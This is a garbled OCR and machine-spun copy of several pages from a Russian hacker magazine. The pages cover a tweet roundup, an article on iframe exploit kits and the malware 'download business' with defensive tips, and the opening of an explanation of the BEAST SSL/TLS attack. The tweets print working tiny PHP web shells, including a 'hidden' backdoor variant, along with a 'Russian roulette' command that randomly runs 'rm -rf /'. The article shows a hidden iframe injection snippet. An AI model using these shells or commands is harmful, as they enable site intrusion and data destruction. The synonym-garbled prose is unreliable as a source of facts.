т в рассуждении решай: массовость, а из большим в количестве ба нов со от т ороны

тегии чтобы продвижения своих ресурсов, ваш покорнейший слуга чуть расскажу что касается самом

п оисковы х систем , равно л равно но штучная, же качественная работа. Также

ос н овном . П ервым делом нужно попасть во дефлятор поисковых систем,

из насчёт ветую неграмотный стоп! нате беспла т ных решениях , описан н ых

чтобы что не возбраняется ис п ол ь зовать их встроенные AddU г l сервисы не так — не то про­

мной, а п отратить некоторое величина денег да сил н а поиски равным образом по­

гоньба сообразно социальным закла д кам. Список сервисов со ц иальных закладок

ко у пку со пециальн в рассуждении заточенного перед сие ремесло софта. Деньги вернутся

позволено жениться от получи и распишись ш его диска. П ости т ь ручной п об закладкам может

для те б е не без; торицей

066

:1. :::;: ХАКЕР

01 /15 0/201 0


rakernelpool: Атаки не без; указателем квоты

Счастливого

пула еще далеко не работают на

ния

Windows 0. Указатель про­

IE6.

0О-го дня рожде­

Это странно, беспричинно равно как

принимать безвыгодный беспричинно целый ряд

0О-летних

цесса поКСОРен со случайным значением

стариков, вокруг, которым твоя милость желал смер­

[ nt! Ехр PooiQuotaCookiel.

ти покамест

0 планирование

взад ..

0!1!1

Комментарий:

Закон обмана: величина раз­

liiil

Переполнения пула никак не получается на вось­

дуваемой информации об уяз­

мерке. Кому увлекательно в духе а зто работа­

вимости вплоть до релиза ее деталей,

ло, советую обозреть презентацию [ Ьit.

Внимание: вы малограмотный надлежит бытийствовать

ly/qiWгtS I.

'анонимусами', аюшки? бы существовать

назад в соответствии реальной угрозе.

raanonymouSabu:

Анонимусами . Не бойтесь выка­ зывать поддержку идее.

raox6D6172696F:

rathegrugq:

Хороший короткий РНР

Я поддерживаю

шелл из http://h.ackack.net/tiny-

disclosuгe, от случая к случаю твоя милость сообща­

selective

php-shell.html //<?=[$_=!а$_ GEТ[2]J.Ia$_[$_GEТ[1]1?> Почти no-alnum.

работе твоему эксплойту. <<Исправьте зто [и

Почти .

между тем ваш покорнейший слуга получу гооt]>>

raanton_chuvakin:

ешь об баге, который-нибудь мешает

Боже, кабы твоя милость существуешь,

пожалуйста, отнюдь не позволяй им создавать новую технологию

APS -

0!1!1

liiil

<<АРТ Pгevention

System>>

Комментарий:

Типа «скрытый» шелл . Можно юзать

как бы бэкдор. Идея во том, что:

rachrisrohlf:

<? $vаг1="system"; $vaг2="diг";

Когда ваш покорнейший слуга в коренной раз слышал оборона

$vаг1 [$vаг21;?> . Тогда понятно, что такое? данный шелл нужно юзать так:

http://localhost/shell.php?1=diг&2=system Символ

ra используется ради скрытия оши­

борт во логах об отсутствиие индексов

0и 0

на запросе [то, сколько требуется к бэкдора, ведь,

{NX, DEP, SafeSEH, SEHOP, ASLR, RELRO, SmaгtPtгs, Safelnt, /GS, Неар Cookies, Uпliпk Checks Л'd fn ptгs, Reoгdeгed Vaгs, SDL, Saпdboxes}, автор этих строк думал, что-то ошибки memory

razeminlu: Русская лента на UNIX: sudo [ $[ $RANDOM% 0]==О] && гm -гf 0 01 echo "You live"

соггuрtiоп мертвы.

быстрее всего, легитимные требования будут

Единственное а решение- отлучка

laDidierStevens:

вышагивать вне сих дружка метров!. Итого - <?php

багов вообще. Это до этих пор далеко не развязка :1

Хорошие новости. Потестил ваш покорный слуга

[$_="system"l.$_["diг"l;?>.

nсевдо

ASLR на ЕМЕТ'е вместе с вклю«bottom up

ченной опцией

гandomization>>. Оказывается псевдо-АSLR

radakami:

где-то но хорош, на правах да настоящий

ASLR.

«Я прежде думал, в чем дело? визига это У меня такие но проблемы вместе с

LDAP,

в качестве кого не без;

самый видный учреждение во

S во SNMP

моем теле. Затем мы осознал, кто мне зто говорит>>.

Комментарий:

В отклик нате взламывание kenel.oгg,

0!1!1

Комментарий:

Pгotocol

liiil

Дэн Камински цитирует Эм что до

SNMP=Simple Netwoгk Management

Филлипса [американский лицемер ... !

LDAP=Lightweight Diгectory Access

ra

SecuгeTips рекомендует заnу­ скать серверы на гunlevel

0,

в надежде

избежать бэкдоров во гсЗ.d скриптах.

Pгotocol Лопата.

ХАКЕР

01 054/ 011

067


взламывание

So Better

НА ЧЕМ ЗАРАБАТЫВАЮТ ВОРОТИЛЫ БИЗНЕСА ЗАГРУЗОК

за и нападени Если твоя милость безграмотный вращаешься в определенных кругах, так не похоже

ли знаешь относительно том, каким образом

Вся извещение

l fгame, alias nлавающий фрейм,- сие одинокий форменный НТМL­

nредоставлена

документ, какой-никакой совместно от другим содержимым да другими фреймами

до невозможности в ознакомительных

может состоять отображен во любом месте веб-страницы. Проще говоря, этоттег

связаны в ряду на лицо убеждения

целях . Ни редакция,

nозволяет использовать единый сайт среди сайта. Есть двушничек основных <<черных>>

ни пишущий сии строки никак не несут

ifгame, траф равным образом загрузки . Однако,

ответственности следовать

метода исnользования сего сверху nервый взор безобидного тега:

разве тебе взять раз в год по обещанию на жизни

произвольный возможный вред, nричиненный материалами данной

встречался SМS-блокер другими словами

статьи .

0. Атаки получай комnьютеры обычных nользователей nри nомощи эдак назы­ ваемых эксnлойт- nаков . Айфрейм безупречно nодходит для того сих целей, ведь постоянно nроисходит за кулисами с юзера;

0. Н акрутка всевозможных счетчиков nосещений, для nрим еру.

твой мейл оказался завален

Livelnteгnet либо Яндекс . Метрика.

спамом, ведь знай- твоя милость попался

В данной статье автор сих строк будем анализировать как nервый метод.

на лапы ко нехорошим людям,

Схема его исnользования баста nроста:

которые на своем теневом

0. 2.

бизнесе оперируют во вкусе раз этими словами.

Покуnается либо — либо nишется эксnлойт-nак; Покуnается не ведь — не то арендуется антиабузный хостинг ради установки эксnлоит- nака ;

0.

lfгаmе-код сего экс nлойт-nака вставляется сверху как бы дозволено большее количество НТМL-страниц;

0. Уязвимые браузеры n осетителей сих страни ц nробиваются от n омо­ щью эксnлойтов изо nа ка;

068

ХАКЕР

01/154/ 0011


lfгame: щит равным образом приступ

~~

- - -- - -- - - - -

------~

--

СТАТИСТИКА

Осtюsные Бvtый сткок Вс:троенные ~eiCfbl BнtWH IIЙ I"A YI~OМI'IViИII ДonoлниrUII>ItO Доnолннrепьные оrран~о~ чения ААА нем,р.еж.tы~~; с111йтое

ЗА ВЕСЬ ПЕРИОД

При~t ~ltЩе\ К.ШtНЬI I'tЫС t1 0стрОЙО! ltтyneJOT 0J СЩ 01116о Hl НО IОЙ CТJI~ HIЩt, либо МОU\11! o6нOIJi et1 И.II tиyute\i CJPIHIЩЫ (1ручwу10)

(i} Зtnрmнь <AUOIO> 0 <VIDEO>

0

З111nретмn. оrображен ие ~еа.tекто• M~eromedi tФ F11mC!I

0

Зtnp e~ отображенке )lltt.teнтo• <IF RAME>

gj

Звnретмn. oтoбputtt~иe 'ntмtmol Microsofte Silllv!ight""

0::}

Зanp enm. отобрц:ен ке )1\tм~о• < F RAМES>

fi]

З1npenm. отобрuсttше )lltмtктoa друrмх м1mноа

li) Зanpenm. Ofont-ftce

0160 ХИТЫ

[J При ..еtU~ть ""' огрмtиченмя м д.пао~.оверенным айто•

ЗА СЕГОДНЯ

({} 0JIOirnj)OIIП.IIto6oЙ ~ЫICI" С IIЦOIЦ'tti11ЬIX CIЙYOI

0160 хиты

bll

BЬ!ДeJUtn> uбпоmроа•нные :t.nементы '"' чком из pil.l~toй

Е) Не on.tNIHo o6~tltТЫ, '(ОТО~ p•<ПOIIOJt:tHЫ Hl HtHIДOCitblX СIЙТIХ

I1J lJ

ПодтаержА~ть аременкую puбlюкttpolкy O~el("fl Hl страt~нце Cto~ч1111n. ябпок11роttн"ые oб"tiCfbl

062 хосты

04 ЗАГРУЗКИ 0it

062 хосты

04 0дГРУ31<И -

ПРОБИВ

0.46% ПРОБИВ

• Статистика одной с действующих связок эксплойтов

CINrCiick-saщип Кll страннцu_

li} недоаерен ньа

{i] АО1tренных

0.

Дорвеи.

Дорвеи- сие сайты, которые отнюдь не несут дрянной полезной инфор· мации чтобы обычного пользователя . Создают их интересах привлечения трафика от поисковых систем для партнерские сайты, которые

NoScript во Firefox

что являются простым равно обманками. Например, во случае с СМС-платниками юзер малограмотный получает нуль награду по прошествии

0. 6.

отправки одной либо нескольких см с. Подобные сайты быстро могут

К посетителю инкогнито грузится каждому свой софт

[отсюда беретик свое початок экстремум <<загрузки>>];

применяться для того распространения вирусов да тому п одобного

Взятый почти нерушимый надзор субноутбук сего посетителя ис­

добра. Все чаще их создают получай взломанных сайтах, этак называе­

пользуется интересах совершения каких-либонезаконных действий

и, во конечном счете, пользу кого заработка .

мом «ЛОМе».

0. SEO,

белые ресурсы.

Злоумышленники вдобавок могут разработать равным образом хорошие сайты со хоро­ шим контентом равно приятным дизайном. Такие сайты продвиг аются

Чисто технически до этого времени довольно-таки понятно, же остается вопрос:

каким образом злоумышленники получают п осетителей [траф] получи

во поисковы х вместе с истемах, а спустя время имеют нет слов всякие интересные места

з араженные страницы?

своих пользователей со через постоянно тех а айфреймов. К счастью, сами поисковики также безвыгодный дремлют, да такие сайты почасту

ИСТОЧНИКИ ТРАФА

награждаются табличкой от предупреждением касательно возможной опас­

В бизнесе загрузок существует огромное состав от п особов для привлечения трафика. Притворимся инсайдерами равно рассмотрим

да сти .

0.

Спам . Очевидно, который пошлый сп а м как и являются распространителем

самые основные изо них.

вредоносных программ. Часто образец вставляется в редиректы.

0.

Редиректы- сие возможность пользу кого перенаправления поль зователя

Покупка.

Купить- это, пожалуй, самый вразумительный способ. Туту злоумышлен­

получи и распишись нужную страницу иначе говоря балка т. Злоумышленники то и дело используют

ников снедать малость вариантов: пок у пка со рук бери всевозможных

уязвимости на сайтах на того, с тем образовать получай них редирект. Та­

хакерских форумах или — или обнова получи и распишись специализирова нны х биржах

ким образом, человек, пере ходящей нате не внове сайт, попадает на

SЕО-трафика. Многие форумы прямо кишаттемами об продаже

лапы вредителей. Тем самым убиваются разом неудовлетворительно зайца: лицо

трафика : <<Продам

US, UK, AU>>

попадаетнан ужныйсайтиподвергаетсяатакесвязоксплойтов.

либо << Продам м незнакомец 000к >>. Это да

глотать те самые топики, идеже злоумышленники покупают поль­

Также на рассылках может быть, скажем, Wогd-файл из заманчивым

зователейдлясвоихзловредныхдействий.Од накоестьодно

названием, идеже также присутствуетссылка для вредоносный сайт. Или

<<НО>>- сметь со прилавка всамделишно безукоризненный движение приземленно

человека легко просятскачать файл, который, равно как твоя милость понимаешь,

невозможно, ибо что такое? продавцы во центральный массе используют

является вредоносным. Самое удивительное, чтотакие просьбы

его сами, а продают для того того, чтоб выудить вяще выгоды.

составляются специалистами на области НЛП равным образом социаль утнапиштим инжене­

Или а товарооборот изначально изволь на большое часть рук, ведь

рии, равно скольжение ер сплошь и рядом самовластно из качает равно запустит все в равной степени какой лихо вред.

естьзлоумышленник у свершить денюжка получи этом трафике будет тяжелее, приблизительно ка ко отдельный новоиспеченный по мнению купатель может поделаться его конкурентом.Увы,покупаятрафиксоспециализированных

П осле обзора источников трафа у тебя мамой клянусь возник покамест сильнее

бирж, да далеко не стоитрассчитывать в рука трафика. Почти

жгучий вопрос: а на хренища но нагружать сии вирусы равным образом оставшиеся вреда­

поголовно спирт состоит изо б от в, которые, наравне твоя милость понима ешь, ни в который

носы? Давай копнем до данный поры капелька глубже равным образом как карты лягут бери то, нате нежели

безвыгодный годятся. Но изменение неграмотный есть расчет бери месте: на последн ее пора

злоумышленники получают дивиденд во описываемом бизнесе.

стали выходить из пециали зированные биржи в духе разок на таких

черных дел. Многие недобросовестные вебмастеры равным образом владельцы

0.

сайтов с умыслом продаютсвой пробка туда, зная, камо спирт подходит

0.

Фейковыеантивирусы. Твой переанальный маршрутизатор подвергает ся заражению, да у тебя,

равным образом почто может содеяться не без; пользователями .

что сообразно мановению волшебной палочки, п оявляется антивирус,

Шеллы, фтп, вплоть до ступы, админки .

хоть твоя милость ни аза равно отродясь безграмотный устанавливал. Он во огромных количе­

На тех но самых форумах во всякое время не кошелек со деньгами огромное величина

ствах находит вирусы, говорят заразившие твои файлы. Для того

объявлений что касается продажетак называемых шеллов, фтп, доступа во да

с целью поднять всегда сие непотребство, те бе предлагается сметь из прилавка

админок. Это, как бы правило, взломанные сайты, со которых программист

полную версию а нтивир уса, которая имеет смысл сильнее

хочет выудить прибыль, продав для ним доступ. Злоумышленники

Человек, вслед за гр узив ший этотантивирус натвой компьютер, получит

000 долларов.

заурядно используют их про рассылки спама, создания дорвеев

комиссионное вознаграждение со каждой ёбаный продажи. А ты- ничего, не считая со­

равно в целях того, дабы поставитые самые айфреймы держи домашние связки .

жаления что до потраченных средствах .

Иногда доводится даже, в чем дело? прежде боли наслышанный сайт становится

0.

Подмена выдачи.

вредоносным. Время излечения ото заражения зависитуже ото

Этот видимость вреданоса паче дружелюбен для п ользователю, эдак

администраторатакогосайта.

на правах ведетон себя оченьтихо да п что до купать ни ложки неграмотный просит. Эта

ХАКЕР

01 / 054/2 011

069


взламывание

И Н ЖЕКТЫ И АВТОЗАЛ И ВЫ

КАК ЗАЩИТИТЬСЯ ОТ АТАК ЧЕРЕЗ IFRAME

Инжект ы - эт по отношению на недрение относительно п ре д е л енного ко д а во б р аузеры !прямо как плагиныl чтобы анализа каких-либо полей равно новый дополнительной информации п ользователя . Чтобы паче уяснить , на какого хрена они нужны,

Теперь, когда-никогда твоя милость оправился через ужаса токмо написанного выше,

предлагаю обсудить неболь ш ой пример. Для того с намерением надыбать

мы хочу расславить тебе по отношению защите с айфреймов. Как говорится,

деньга со счета, злоумышленнику нужно ведать кое-какие допол­

выход утопающего- деяние рук самого утопающего. Итак, поглощать

нительные материал !кодовое слово, девичьи происхождение матери равным образом т.д.).

мало-мальски инструментов :

Взять их может статься бы неоткуда, выключая наравне у самого пользователя. Но не спрашивать но их напрямую? На самом деле мшкно, только сложно -так,

0. Антивирусы .

дабы некто отнюдь не заметил подвоха. Для сего пробы помещать негде может перекинуться для

Самым простым способом защиты является, натурально же, антивирус,

зло-кодерам, которые да пишут сии самые инжекты. Обычно их создают

который-нибудь бросьте отвращать атаки нате твой маршрутизатор от приблизительно

особо около регистрация сайта, вместе с которого подальше бросьте вымогаться

называемых << грязных сплоитов >> . Грязные сплоиты- сие сплойт­

сообщение !например, странички онлайн-банкинга). У человека подле

ещё , которые в своё время сейчас были обнаружены антивирусными

заходе на родной аккаунт в банковском сайте неотъемлемо всплывает окно,

компаниями сиречь другими сервисами в виде Ma l waгe Тгасkег'а .

которое запрашивает торчмя в этом месте равно теперь подсоединить дополнительные

Таким образом, около атаке грязной связки антивирус сможет

данные. Ничего далеко не ревнующий ламер их вводит. Данные,

отстоять твой переанальный компьютер, таково во вкусе сайт alias адрес связки

во свою колонна , отправляются злоумышленнику, а после этого около их по­

уж были занесены на базы обновлений.

мумия равным образом совершается покража средств.

0. Плагины .

Аз- сие автозалив щ ик. П по отношению сути сие случай троя бери , которая

Злоумышленники- человеки в некотором расстоянии никак не глупые да навряд ли станут хранить

позволяет не принимая во внимание участия оператора !владельца ботнета) автоматиче­

личный софт во <<грязном >> состоя н ии, оттого я н е буд ем н а

ски вести лиман !перевод денеж н ых средств со банковского

считать н а антивирусы да постараемся ради щ да т ить свою машинку

эккаунта жертвы) нанекоторого раньше обозначенного дропа. К

сами. Так в духе большая доля атак нацелена бери плагины IAdobe Flash

примеру, автозалив может исполняться во момент, если пострадалец

Рlауег, Java, Adobe Readeг) , советую тебе без труда удалить их . Хоть

заходит возьми страничку своего онлайн-банкинга.

сие равно никак не ахти удобно, зато как никогда безопасно, тем малограмотный менее во плагинах

000%

утилитарно ежедень обнаруживают какие-либо дырки . Отдельного упоминания требует Java, приближенно вроде во ней находится большая порция уязвимостей. Ее на л юбом случае л учше вык л ючить, потому что-то бери скольжение вИнтер н етеэто казаться малограмотный повлияет.

З . Обновления. Не необдуманно производители программ завсегда пытаются втиснуть на наравне

не грех большее количе не без; тво мест сии надоедливые механизмы обновлений. П омнишь, во детстве ввек заставляли зеленого змия невкусные лекарства? Тут всё что-то около же. Эти <<лекарства >> по образу раз в год по обещанию и устраняют совершенно уязвимости, котор ы ми приблизительно подолгу пользуются злоумышленники .

0,. Блокеры lframe·мoв. Блокеры фреймов- сие лучшее намерение ради тех, кто такой безграмотный привык к << неполноценному >> Интернету. Нехитрое манипуляция по мнению блокированию

фрейма накануне того, по образу возлюбленный открылся, во п олне довольно ц е н хотя сможет уберечь твой компью т ер ото заражения . Многие

<< No Аds >> -дополнения имеют на своем арсенале такую функцию,

в духе запирание lfгаmе'мов, для п ример, NoScгipt l noscгipt . net ) . Для включения функции блокирования фреймов заходи во <<Инструменты

0 Дополнения >>, спустя время заходи на опции NoScгipt ' a, открывай вкладку << Piugins>> равно ставь галочку в п ротив << FoгЬid <IFRAME»>.

0. JavaScript. Этот кардинальный сnособ опять же поможет избежать заражения, т. к. криптеванный образец без затей н е сможет сработать. Однако безграмотный смогут

трудиться да прозопальгия ш инство современных сайтов :). Так другими словами иначе, имей в виду, что такое? соответствующая наладка кушать во настройках любого браузера.

С КАЖДЫМ ДНЕМ ПОЯВЛЯЕТСЯ ВСЕ БОЛЬШЕ НОВЫХ СПОСОБОВ КРАЖИ nровер ка х орошо после ко риптованно й связк равно получи и распишись чистоган ичи е вирусов

070

ПЕРСОНАЛЬНЫХ ДАННЫХ ХАКЕР

01/154/2 011


lframe : ограда равно срящ

зксплоиты

%ВСЕГО

%t

0

00.00

0

08.57

0

04.29

ХР

0

000.00

PDF LIBТIFF

0

0.14

08.57

FLASH > Java SMB

04.29

Java ОВЕ

00.00

-

ЗАГРУЗКИ

ЭКСПЛОII'IТЫ

Windows

0.14

v

Windooл•s ХР

000.00

х

Статистика в соответствии с эксплойтам во одной иэ связок

план меняет рекламу да результаты поиска во Интернете нате

r··..-lы npeдлaraet·l f:.Эr·r зарепктрtrров.эн.е:::J во наше1:1

PPI

партнеро~о1:1 nporpar-н·re.

Пр1rн1н-r.эеr-r адвертов ото :.оо 01нст.элов на с;,•тю1.

рекламу злоумышленников, которые получают вместе с сего доход.

З.

Такой принятие в большинстве случаев используется какдополнительный сноровка

Пл а т иl'"t:

заработка получи зараженных машинах.

Ценовt-rе \/СЛОЕ:Irя

Винnоки/Бnокираторы.

-

РеГ•/Л·::Jрно r·:plrnт·,,~er-rt.в'r е:~е.

-

Подробн.э:::~ онл.эr-1н стапкпи<а.

Самый недобрый порядок выжимаденег изо загрузок. Специальная программа блокируетсистему равным образом проситсделать что-то, с целью твой

нейрокомпьютер был разблокирован. Сейчас адски популярны предло­

::.эвrrсят через ~~-эцества ваши:: trнcтa.noE:.

- Гр··,"Зtнt.ся нr:~ий COi~H да неграмотный r-rewaeт р.эботе п~· to::epa. -Выплаты r·:а:·t~дый вторниr~ ~:а предыд1,rщ\'Ю неделю.

-

П 0е

ост.:шляеr.r свя=:~~~~.

жения со пополнением баланса сотового оператора во сделка получи код дляразблокировкинагипотетическомчеке.Послепополнения

телефона злоумышленника твоя милость никакого заключение неграмотный увидишь, равным образом твой

Н е на ы для уп ае~"< t :

0) 2)

[.·Jнсталы, нд·.,,.щие Е: нес~·:олt·~·:о p·Jiк

l··1нсталы вместе с порн·у-шны:.: са~~нов (адалт).

компьютертакиостанетсясокном,котороепроситпополнитьномер

мобильного телефона. Также интересах ускорения получения денег да сызнова

Про вместе с ьб а не без; р я у у каз ы ва ть:

большего испуга пользователя злоумышленники используют над­

0) 2)

писи, которые гласят, что-то посредством некоторое минута файлы вместе с компьюте­ рабудутудалены,хотя,скореевсег~ничеготакогонепроизойдет

t..

Аккаунты с банков/Кредитные карты/

0=-'./ТОЧНЬIЙ 06Ъet•l f1НСТ.ЭЛО8. Проис::о:1:·дение инст.элов(теr·rапн<а).

nост бери одном с специализированных форумов

Другая личная информация. Все перечисленное сверх является опорный целью людей, которые

шифр [на практике твоя милость ой ли ли заметишь эдакий код, таково что нормально

соответственно ража надстройка вирусами компьютеры простых пользователей. На маши­

ifгame подходяще закриптован равно обфусцированl:

ужели попадает какой-либо граббер, например, сейчас набившие оскомину всем антивирусным фирмам Zeus или — или SpyEye, а там этотграббер ворует постоянно введенныеданные да отправляют их в сервер, идеже

<iframe src="http ://s ite.ru / l . php" width="e" height="e" frameborder=" e" ></iframe>

злоумышленники анализируютих равно находят нужную им к кражи

денег ан фу. С повышением грамотности пользователя да развитием безопасности софта присваивать такие способности из чего явствует сложней, а равно тене­

Здесь твоя милость можешь познать ссылку site.гu/1.php равным образом некоторые люди пара­ метры. Давай сперва пройдемся по части ровня метрам:

плач гешефт далеко не имеет смысл получи и распишись месте . С каждым денно появляется всё-таки больше новых способов кражи персональныхданных: для примеру, инжекты равным образом

в такой мере называемые «аз>> программы (подробнее кайфовый врезке! .

0.

Ддос.

width="e" - ширина height="e" - высота frameborder="e" - убирает параметры фрейма

Создание ботнетов интересах совершения DDоS-атак-это еще повсед­ невное дело. Чаще сумме владельцы ботнетов оказываютуслуги

0.

0.

Данный шифр скрывает подгружаемую ссылку, делая ее незаметной

по мнению вымоганию денег со владельцев интернет-ресурсов подина угрозой

для того гляделки пользователя. По самой ссылке находится букет из эксплой ­

ддос-атаки.

тами. Сначала определяется поверхность браузера, наличность плагинов да молодчик ОС,

Спам.

а по времени свясло пытается <<пробить>> оный браузер всеми доступными

Ботнеты используютсядля рассылки спама. Самым известным был

методами. Эксплойты заурядно берутся вместе с багтреков не ведь — не то но покупают-

ботнет

ся во привате ради п-ную сумму зеленых президентов. Если эксплойт

Rustock, кто во приманка лучшие из лучших век генерировал предварительно 0

миллиардов писем на сутки.

сработал, так ко пользователю безотчетно загрузится либо — либо самовластно вирус,

Продажа.

другими словами специальная программа-лоадер, которая достаточно у моря погоды команды

Данное руководство было бы неполным вне упоминания такого при­

с <<центра>> в загрузку определенного софта. Также есть смысл отметить,

митивного способа получения нечистой прибыли, равно как простая

в чем дело? во последнее минута появились такие связки, которые во случае не­

распродажа загрузок перед определенные описанные вне цели.

пробива пользователя используют повадки социальной инженерии из

Люди создают огромные сервисы согласно загрузке вредоносных про­

просьбой относительно загрузке вируса.

грамм получай компьютеры пользователей равным образом зарабатывают бери этом незаконном бизнесе немалые монета . Сегодня твоя милость узнал что касается целом бизнесе, тот или иной цветет да пахнет шито-крыто через

РЕАЛИЗА!JИЯ Я никак не буду описывать, наравне подключиться на описываемый бизнес, приблизительно в качестве кого

тебя. Теперь твоя милость знаешь, что уберечь себя через нежеланных <<гостей>>

получай своем компьютере равно как бы отнюдь не заделаться обманутым. Хотя на способах за­

сие отвратно равно противозаконно. Опишу всего только вкратце, в духе злоумыш­

щиты мы равно привел прописные истины, же архи многие п ренебрегают

ленники заражают страницы возьми уязвимом сайте. Итак, допустим,

аж ими . Я надеюсь, зачем твоя милость намотаешь возьми усик всю представленную

на НТМL-исходнике какого-либо ресурса твоя милость обнаружил ниженазванный

информацию равно неграмотный позволишь злоумышленникам нажить деньги нате тебе. ::Х::

ХАКЕР

01 /154/ 0011

071


хакинг

Коллективный р я лоб широк

ПЕРВАЯ РАБОТАЮЩАЯ

АТАКА НА SSL/TLSПPOTOKOЛ Передаваемые по мнению SSL-соединению данные можно расшифровать! Для сего Джулиану

Риццо равным образом Тай Дуонгу посчастливилось использовать недоработки во самом протоколе

SSL. И

пусть себе

говор ноне малограмотный отлично в отношении полной дешифровке

трафика, разработанная ими обслуживающая программа

BEAST

может извлечь изо зашифрованного

потока то, что такое? представляет собой наибольший интерес,- секретные кукисы не без;

да дентификатором сессии пользователя .

ЧТО ТАКОЕ BEAST? 103 секу н ды потребовалось утилите

Всего

ВЕАSТ I B гowseг

Exp loit

Agaiпst SS L/Т L SI, воеже дешифрировать причина н ую кукису интересах вхо д а во аккау нт

PayPal. П освидетельствовать ви д еокас т м ож н насчёт н а Yo uTube IQiJ.bl omqAsQ J. Это н е фей к. Ж равным образом вая д емонст р а ц ия ути литы п ро ш ла во рамках конфе р е нц ии Ek opaг t y во Буэнос-Айросе, идеже да ссле д по части на а те л да выступили с докладом равно п оказа л равно незаглушенный pгoof-of-coпcept. Ис п ользуемая

у язвимость дейс т витель н в отношении позволяет неуловимо п ерехва т ывать дан­

ные, передаваемые посередь веб - сервером равно браузером п ользователя. По иронии судьбы удар эксплуа т ируе т безвыгодный какую-то новую найденную

во протоколе брешь, а небезупречность

SSL/TLS -де из ятилетней давности ,

долгое срок считавшуюся опрятно теоретической. Н о, в духе говорится, раз на година равно клюка со т реляет, этак который полоз следовать червон парение незащищенность правильно

можетп ерей т иизразрядатеоре т ическихвов п ол несебепрактическую. Исслед ова тели на срок безвыгодный п убликуют ут либо т у, н по части мол л мы тся wh i tepapeг'oм

072

ХАКЕР

01 / 054/2011


BEAST:

относительно проделанной работе I Ьit. l y/oBLWHX ). Програ мма состоит изо двух эле­

Ci ;

Е(Кеу,

чрезвычайный кража SSL-кукисов

Mi xor Ci-1)

ментов: снифера, какой анализирует НТТРS-трафик, да специального

агента, написанного бери JavaScгipt равно Java, тот или иной долженствует бытовать под­

Во времена шифрования первого блока завершающий телекс ХОR'ится

гружен на браузере жертвы !для этого, для примеру, делать нечего вынудить

некоторым вектором инициализации llпitialization Vectoг, IV), тот или иной

пользователя разинуть страницу не без; нужным кодом) . Агент нужен на того,

заменяе т вывод предыд ущего шифрования, которого соответственно понятной

ради особым образом насаждать способности во оный а безобидный яйцевод

причине нет. Все довольн в отношении просто. Однако каста концепция описывает

связи, тот или иной используется в целях передачи секретных кукисов. Как сие

ситуацию интересах одного большого объекта, таког о, например, в духе файл,

позволяет расшифровать данные? Вот после этого вступает века известная

какой-никакой подумаешь разбивается в блоки. В свою очередь, SSL/TLS явля­

чувствительность SSL 0 . 0/ТLS 0.0, получи которой наша сестра остановимся подробнее .

ется крипто графическим протоколом- ему надобно зашифровывать

далеко не отдель ный файл, а серию шаг кетов. SSL/ТLS-соединение может

ОСОБЕННОСТИ ШИФРОВАНИЯ

SSL 0.0

Протокол SSL 0.0/TLS 0.0 позволяет эксплуатировать кодирование

существовать использовано к отправки серии НТТРS-запросов, первый попавшийся

с которых может присутствовать разбит получи и распишись безраздельно другими словами паче батман кетов, которые,

симметричным ключом, используя либо блочные, либо потоковые

на свою очере дь , могут присутствовать отправлены во поток на правах нескольких

шифры . На практике, однако, обыкновенно используется блочные шифры ,

секунд, эдак равно нескольких минут. В данной ситуации вкушать пара способа

равно описываемая нами налет применима то-то и есть с целью них. Чтобы вник­

пускать в дело общественный порядок СВС:

нуть на суть, нужно недурственно представпять себя базовые понятия. Принцип работы блочного шифра заключается на отображении

подвергать обработке каждое отчёт равно как индивидуальный объект, генериро­ вать последний градиент инициализации да кодировать соответственно описанной схеме.

блоков открытого текста на зашифрованные блоки того а размера.

культивировать однако сведения равно как как бы они объединены на безраздельно

Проще лишь показать блоковый шифра во виде гигантской таблицы,

больший объект, сохраняя СВС-режим посреди ними. Этого дозволено до­

со держащей 0л128 записей, каждая изо которых охватывает устройство текста

стичь, используя на качестве вектора инициализации в целях сведения

М равным образом подобранный ему зашифрованный агрегат С . Соответственно,

n новейший объединение шифрования предыду щего сведения ln-1). Внимание, первенствующий момент. Протокол SSL 0.0/TLS 0.0 использует

для того каждого ключа шифрования довольно отдельная такая таблица. Далее ты да я будем называть шифровка во виде функции:

другой вариант, равно то есть во этом кроется способ ради проведе­ ния атаки .

С

;

Е(Кеу,

М),

ПРЕ СКАЗУЕtv1ЫЙ ВЕКТОР ИНИ

~~;...;..;...;~=..;.~

ГдеМ-ис ходные данные, Кеу- отпирка шифрования, а С- по­

лученные зашифрованные данные.

Блоки имеют жалкий размер !как правило, 06 байт). Поэтому возникает вопрос: вроде длинное сообщение? Можно раз­

Атака строится держи нескольких допущениях, только попытка создателей

BEAST показал, в чем дело? их тотально достижимо привести в исполнение на реальной жиз­ ни. Первое допущение: умышлятель в долгу кто наделен мочь

снифать трафик, что переда ет браузер. Второе допущение:

аплодировать сведения возьми блоки одинаковой длины !те но самые 06 байт) равным образом

бузовый человек каким-то образом принуждён застави ть жертву пере­

с головы группировка на отдельности. Такой приступ называется

выделять способности по части тому а самому безопасному каналу связи. Зачем

режимом безыскуственный замены IECB, Electгoпic codebook), только используется

сие нужно? Рассмотрим случай, когда-никогда в ряду компьютерами Боба равно

редко. На в таком случае кушать причина: буде да мы вместе с тобой будем зашифровывать двушничек одинако­

Эли от общепринято безопасное соеди нение . К нам попадает сообще­

вых за содержимому блока, ведь во результате равным образом для выходе получим двум

ние, i-блок которого, наравне да мы от тобой предполагаем, содержит, параль Элис

одинаковыхзашифрованныхблока.Этовлечетзасобойпроблему

!или секретную кукису- неважно). Обозначим зашифрованный объединение

сохранения статистических особенностей исходного текста, которая

вроде Ci, целесообразно Mi- ее движение роль. Напомню, зачем Ci; Е IKey, Mi

хоро шо продемонстрирована нате иллюстрации. Для избегания такого

хог Ci-1 ). Теперь предположим, почто ее параль-это Р. Главная рецепт

эффекта был разработан нагрузка сцепления блоков шифротекста ICBC,

во том, зачем да мы вместе с тобой можем разобрать правильнесть нашего предположе ­

Cipheг-Ыock chaiпing), во котором отдельный нижеприведённый содружество открытого

ния! Итак , автор знаем !так в качестве кого смогли перехватить) градиент инициа­

текста ХОR'ится вместе с предыдущим результатом шифрования:

лизации, некоторый короче применяться чтобы шифрования первого

ХАКЕР

01/154/2011

073


хакинг

Onc рьпый тексr Вектор ИНIIЦИалИЭЗЦIIИ

За1111фрооажый

Зашифрованный

Заwифроваииый

теr.ст

слова

формулировка

Принцип действ да автор этих строк еве-шифра

ориг равным образом нальная битовая ко арта

блока следующего сведения . Это, соответственно, концевой секция

тайнопись во режиме ЕСВ

предыдущего сведения [в зашифрованном виде)- обозначим его

IV.

Мы вот и все перехватили равным образом знаем роль блока , идущего предварительно

Ci- табор н ачим его Ci-1. Эти сведения нам жуть нужны. С их через

П робле м а р не душа — змея има п ростой замены

